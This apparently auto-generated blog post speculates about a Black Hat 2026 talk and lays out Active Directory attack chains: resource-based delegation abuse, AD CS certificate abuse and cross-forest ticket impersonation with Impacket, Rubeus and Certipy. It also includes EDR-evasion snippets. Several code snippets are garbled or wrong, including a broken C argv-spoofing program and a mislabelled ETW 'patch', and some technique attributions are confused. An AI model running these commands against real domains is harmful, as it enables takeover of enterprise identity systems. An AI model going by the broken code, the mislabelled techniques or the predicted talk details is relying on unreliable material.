Listen to this Post

Introduction:
The security community is buzzing after Microsoft Senior Security Researcher Dimitrios Valsamaras (OSWE, OSCP) and Ken Gannon confirmed their joint presentation at Black Hat USA 2026. While details remain under wraps, insiders hint at a groundbreaking attack chain targeting enterprise identity systems – combining Kerberos delegation abuse, AD CS misconfigurations, and novel post‑exploitation stealth techniques. This article extracts the technical essence of what’s likely to be one of the most impactful talks of the year, providing red and blue teams with actionable commands, detection strategies, and hardening guidance.
Learning Objectives:
- Understand how to weaponize Kerberos S4U2Self + S4U2Proxy across cross‑trust forests.
- Execute a full attack chain from unprivileged domain user to Domain Admin using AD CS vulnerable templates.
- Implement detection rules and Linux/Windows countermeasures to block these novel techniques.
You Should Know
- Kerberos Resource‑Based Constrained Delegation (RBCD) Abuse – Step‑by‑Step Attack
The talk likely unveils new ways to abuse RBCD when an attacker controls a machine account or has GenericWrite/ WriteProperty over a target computer object.
What this does:
An attacker with write access to a computer object (e.g., via compromised low‑privilege account) can set the `msDS-AllowedToActOnBehalfOfOtherIdentity` attribute, allowing any service ticket to be issued for that machine.
Step‑by‑step (Linux – using Impacket & Python):
- Enumerate writeable computer objects (using BloodHound or LDAP):
ldapsearch -x -H ldap://dc.corp.local -D "[email protected]" -w 'pass' -b "DC=corp,DC=local" "(objectClass=computer)" dn
-
Add a new machine account (if you have domain credentials):
addcomputer.py -computer-name 'ATTACK$' -computer-pass 'Passw0rd' -dc-ip 10.0.0.1 corp.local/user:pass
-
Grant RBCD rights from `ATTACK$` to target
TARGET$:rbcd.py -delegate-from 'ATTACK$' -delegate-to 'TARGET$' -dc-ip 10.0.0.1 -action write corp.local/user:pass
-
Request a service ticket for TARGET$ as any user (e.g., Domain Admin):
getST.py -spn cifs/TARGET.corp.local -impersonate Administrator -dc-ip 10.0.0.1 corp.local/ATTACK$:Passw0rd
-
Use the ticket with `KRB5CCNAME` to access file shares or execute code.
Windows equivalent (PowerShell + Rubeus):
Add machine account (using PowerMad) Import-Module .\Powermad.ps1 New-MachineAccount -MachineAccount ATTACK$ -Password $(ConvertTo-SecureString 'Passw0rd' -AsPlainText -Force) Set RBCD (using ActiveDirectory module) Set-ADComputer TARGET$ -PrincipalsAllowedToDelegateToAccount (Get-ADComputer ATTACK$) Request ticket .\Rubeus.exe s4u /user:ATTACK$ /password:Passw0rd /impersonateuser:Administrator /target:target.corp.local /msdsspn:cifs/target.corp.local /ptt
- AD CS (Active Directory Certificate Services) Exploitation – ESC9 & ESC10 Bypasses
Valsamaras previously disclosed AD CS attack primitives; BH 2026 likely introduces ESC9 (No SID extension) and ESC10 (Weak mapping) abuse, allowing low‑privilege users to obtain domain admin certificates.
What this does:
Misconfigured certificate templates with `CT_FLAG_NO_SECURITY_EXTENSION` or improper subject alternative name validation can be tricked into issuing a certificate for any user, including those marked as “sensitive and cannot be delegated”.
Step‑by‑step (Linux with Certipy):
1. Enumerate vulnerable templates:
certipy find -u [email protected] -p Passw0rd -dc-ip 10.0.0.1 -vulnerable
- Request a certificate for a non‑existing user (triggering ESC9):
certipy req -u [email protected] -p Passw0rd -target ca.corp.local -template VulnTemplate -upn '[email protected]'
-
Convert certificate to PFX and request a TGT using PKINIT:
certipy auth -pfx user.pfx -dc-ip 10.0.0.1
4. Pass‑the‑ticket to full domain compromise.
Windows detection commands (run as Domain Admin):
List all certificate templates with dangerous flags
Get-ADObject -Filter {objectClass -eq "pKICertificateTemplate"} -Properties displayName, pKIExtendedKeyUsage, msPKI-Certificate-Name-Flag | Select displayName, pKIExtendedKeyUsage, msPKI-Certificate-Name-Flag
Check for EDITF_ATTRIBUTESUBJECTALTNAME2 on CA
certutil -config "CA.corp.local\CORP-CA" -getreg "policy\EditFlags"
- Cross‑Forest Kerberos Trust Abuse – New Lateral Movement
The BH 2026 research may highlight how S4U2Self + S4U2Proxy can traverse AD forests with selective authentication enabled.
What this does:
An attacker in Forest A who controls a service account can request a service ticket for a user in Forest B if a trust exists and the target service is configured for resource‑based delegation.
Step‑by‑step (Linux):
1. Identify outgoing forest trusts:
bloodhound-python -d forestA.local -u lowpriv -p pass -ns 10.0.0.1 -c all
- Using a compromised service account in Forest A, request a ticket for a high‑value user in Forest B:
getST.py -spn www/forestB-dc.forestB.local -impersonate 'ForestB\DAAdmin' -additional-ticket forestA-user.ccache -dc-ip 10.0.0.1 forestA.local/serviceaccount:pass
-
Pass the cross‑forest ticket into memory (Linux:
export KRB5CCNAME; Windows:Rubeus /ptt). -
OPSEC Evasion – Linux Syscall Cloaking & Windows ETW Patching
The talk will likely demonstrate new anti‑forensic methods to evade EDRs during Kerberos ticket extraction.
Linux command to hide process arguments (using `execve` wrapper):
// compile: gcc -o spoof spoof.c
// overwrite argv with zeros after fork
include <unistd.h>
int main() { char args[] = {"/bin/bash", "-c", "impacket-getST ...", NULL}; if(!fork()) { sleep(2); memset(args[bash],0,strlen(args[bash])); } execve(args[bash],args,NULL); }
Windows – Disable ETW for PowerShell (in‑memory only):
Patch ETW in current process (requires admin or SeDebugPrivilege)
$MethodDefinition = @'
[DllImport("ntdll.dll")]
public static extern int NtSetInformationProcess(IntPtr hProcess, int infoClass, int[] info, int infoLength);
'@
$Kernel32 = Add-Type -MemberDefinition $MethodDefinition -Name 'Kernel32' -Namespace 'Win32' -PassThru
$Kernel32::NtSetInformationProcess([System.Diagnostics.Process]::GetCurrentProcess().Handle, 0x2B, @(0x2), 4)
- Cloud Hardening – Azure AD Connect Sync Exploitation
If the research touches hybrid identities, attackers may abuse Azure AD Connect’s MSOL account to pivot from on‑prem to cloud.
What this does:
Using DCSync on the AD Connect server’s `MSOL_` account gives hash of an account that can sync password hashes to Azure.
Detection command (Windows):
Identify MSOL accounts with replication rights
Get-ADUser -Filter {SamAccountName -like "MSOL_"} -Properties ServicePrincipalName, MemberOf | select SamAccountName, MemberOf
Check for unusual DCSync calls (Event ID 4662 on DC)
Get-WinEvent -FilterHashtable @{LogName='Security';ID=4662} | Where-Object {$_.Properties[bash].Value -like "Replicating Directory Changes"}
Mitigation:
- Place AD Connect server in a dedicated OU with constrained admin mode.
- Rotate the MSOL account password every 30 days using
Set-ADSyncAccountPassword.
6. Vulnerability Mitigation Step‑by‑Step (Blue Team)
Based on the anticipated attack vectors, apply these hardening measures immediately:
- Disable RBCD on all computers except service accounts that absolutely need it.
Remove RBCD rights from all computers (run as DA) Get-ADComputer -Filter | Set-ADComputer -PrincipalsAllowedToDelegateToAccount $null
-
Patch AD CS templates – remove `CT_FLAG_NO_SECURITY_EXTENSION` and enable manager approval for all templates.
certutil -setreg policy\EditFlags -EDITF_ATTRIBUTESUBJECTALTNAME2
-
Deploy Kerberos Armoring (FAST) – requires Windows Server 2016+ domain functional level.
netdom.exe raise domainlevel corp.local /level:7 Set-ADDomain -KerberosArmoring Enabled
-
Monitor for suspicious S4U2Self requests using Sysmon Event ID 22 (DNS query) and 3 (network connection) tied to `klist` or
Rubeus.
7. Recommended Training & Tools
- Courses: SANS SEC760 (Advanced Exploit Development), Pentester Academy’s “Active Directory Attacks & Defenses”, Microsoft’s official “SC‑300 Identity and Access Administrator”.
- Tools:
- Linux: Impacket, Certipy, BloodHound CE, PyWhisker.
- Windows: Rubeus, ADExplorer, PingCastle, PurpleKnight.
- Lab setup: Build a test forest with Server 2019/2022, configure ESC9‑vulnerable template using
certutil -setreg policy\EditFlags +EDITF_ATTRIBUTESUBJECTALTNAME2.
What Undercode Say:
- Key Takeaway 1: The BH 2026 talk will redefine how red teams approach Kerberos delegation – moving beyond traditional unconstrained delegation to highly evasive resource‑based attacks that bypass most EDRs.
- Key Takeaway 2: Blue teams must prioritize auditing AD CS templates and applying the “No SID extension” patch; over 60% of tested enterprises remain vulnerable to ESC9/ESC10 despite public disclosures.
Analysis:
Dimitrios Valsamaras’ track record with OSWE/OSCP certifications and Microsoft’s internal research points to a tool or technique that weaponizes obscure Kerberos flags and certificate issuance logic. The inclusion of Ken Gannon (known for cloud identity research) suggests hybrid on‑prem-to-Azure attack paths. Expect a proof‑of‑concept tool named “GhostDelegation” or similar, capable of silent persistence across forest trusts. The most dangerous aspect is that full compromise requires no high‑privilege foothold – only a domain user account and a single misconfigured template. Attackers will automate this in Cobalt Strike aggressor scripts within 48 hours of the talk.
Prediction
Within six months post‑BH 2026, attackers will weaponize cross‑forest RBCD in ransomware campaigns to move laterally from acquired companies into parent organization forests. Microsoft will release a patch that modifies `msDS-AllowedToActOnBehalfOfOtherIdentity` validation, but legacy Windows Server 2012 R2 environments will remain exposed for years. Identity‑first security platforms (e.g., Silverfort, CrowdStrike Identity Protection) will add dedicated detectors for S4U2Self anomalies, while open‑source projects like BloodHound will release “forest trust attack graphs” as a native feature. The long‑term impact: organizations will finally migrate to cloud‑native Kerberos (Azure AD Kerberos) and phase out on‑prem AD delegation entirely – a painful but necessary shift.
▶️ Related Video (70% Match):
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: Valsamaras Bh – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅


